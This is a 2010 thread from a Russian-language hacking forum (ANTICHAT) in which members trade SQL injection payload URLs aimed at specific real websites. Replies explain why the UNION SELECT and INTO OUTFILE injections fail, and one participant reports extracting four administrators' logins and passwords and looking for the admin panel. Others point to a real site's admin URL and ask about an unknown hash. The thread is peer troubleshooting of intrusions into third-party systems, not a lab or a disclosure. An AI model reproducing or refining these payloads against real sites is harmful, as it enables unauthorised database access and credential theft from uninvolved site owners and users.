HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15811  
Старый 10.12.2010, 20:30
JohnnyBGoode
Познающий
Регистрация: 05.10.2010
Сообщений: 48
Провел на форуме:
8669

Репутация: 5
По умолчанию

Цитата:
Сообщение от qaz  
inoxpoint.ru/news.php?nid=66+union+select+1,2,table_name,4,5,6, 7,8+from+INFORMATION_SCHEMA.TABLES--
взгляните на ошибку, как быть в таком случае?
здесь 4 версия MYSQL,в ней нет INFORMATION_SCHEMA
 
Ответить с цитированием

  #15812  
Старый 11.12.2010, 14:44
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

http://theictect.com/rss/daily_deal.php?c=3

вот blind inj, база mysql, в information_schema нет таблиц с юзерами, подскажите что делать? помимо inf_sch присутствуют, еще 3 базы но там тыкать бесполезно.
 
Ответить с цитированием

  #15813  
Старый 11.12.2010, 16:42
Yellow
Новичок
Регистрация: 09.12.2010
Сообщений: 1
Провел на форуме:
188

Репутация: 0
По умолчанию

Цитата:
Сообщение от Lijzer  
Вопрос собвственно вот в чем. Раскручиваю blind sql inj, достал юзера, в information_schema, не все определяются таблицы, а те что определяются в них все пусто. Что делать? db mysql 5.0.77
Ищи SQL в другом месте , часто бывает , что у тебя прав нету это как вариант
 
Ответить с цитированием

  #15814  
Старый 11.12.2010, 16:57
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

ykktbltrn'0

wkpfx}q|e+6

Что это может быть за хешь?
 
Ответить с цитированием

  #15815  
Старый 11.12.2010, 18:01
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от InferNo23  
ykktbltrn'0
wkpfx}q|e+6
Что это может быть за хешь?
щелбан тебе по лбу !!!
 
Ответить с цитированием

  #15816  
Старый 11.12.2010, 18:21
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Yellow  
Ищи SQL в другом месте , часто бывает , что у тебя прав нету это как вариант
Выдрал с 2ой базы логины и пассы 4 админов, теперь ищу админку.
 
Ответить с цитированием

  #15817  
Старый 11.12.2010, 18:39
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Lijzer

http://zoupon.com.au/admin/

не оно?
 
Ответить с цитированием

  #15818  
Старый 11.12.2010, 18:58
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Lijzer  
Выдрал с 2ой базы логины и пассы 4 админов, теперь ищу админку.
ну и где твой вопрос по уязвимостям? модеры потрите этот бред школьника и флуд..мой пост тоже под удаление..
 
Ответить с цитированием

  #15819  
Старый 11.12.2010, 19:19
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
Провел на форуме:
23579

Репутация: -5
По умолчанию

http://iatp.md/index.php?what=nav&id=-1+union+select+1,convert(version()+using+latin1),3 +into+outfile+ae.txt--

подскажите пожалуйста что тут не то?
 
Ответить с цитированием

  #15820  
Старый 11.12.2010, 19:30
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от rootmd  
http://iatp.md/index.php?what=nav&id=-1+union+select+1,convert(version()+using+latin1),3 +into+outfile+ae.txt--
подскажите пожалуйста что тут не то?
во первых ты должен указать полный путь к файлу, во вторых ты должен взять его в кавычки, в третих у тебя нет прав на чтение/запись файлов
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.